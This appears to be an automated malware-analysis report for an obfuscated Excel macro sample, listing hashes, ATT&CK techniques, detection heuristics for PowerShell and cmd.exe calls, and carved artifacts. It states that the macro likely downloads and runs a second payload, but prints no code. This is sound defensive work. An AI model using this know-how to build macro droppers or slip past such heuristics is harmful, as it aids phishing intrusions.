Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 e87b1c828787a9cb…

MALICIOUS

Office (OOXML)

41.5 KB Created: 2021-06-22 12:43:05 UTC Authoring application: Microsoft Excel 16.0300
MD5: d1d2906f7622cc55ff269acc2fb873e1 SHA-1: d7677d5513aa9afe83ec3f75a745e6b2407156f6 SHA-256: e87b1c828787a9cb867bbf9903910a095092956857d2ec6a379b9248ad1dea3f
160 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.003 Windows Command Shell T1566.001 Spearphishing Attachment

The Excel file contains VBA macros that reference cmd.exe and PowerShell, indicating an attempt to execute commands. The GetObject call and the presence of a VBA project strongly suggest malicious intent. The VBA code appears to be obfuscated, but its primary function is likely to download and execute a secondary payload, which is a common technique for initial access via spearphishing attachments.

Heuristics 4

  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
  • VBA project inside OOXML medium OOXML_VBA
    Document contains a VBA project — VBA macros present

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
642f91910db3830af116bdccf3647a123b5fd728e0eb0872c4ccbb6ec48b67c5		 vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 34430 bytes
vbaProject_00.bin
9242cfef67f2767f8d40c88d281ee3cec71f32fd52f2c31377cdb8a3d192652a		 vba-project OOXML VBA project: xl/vbaProject.bin 11264 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.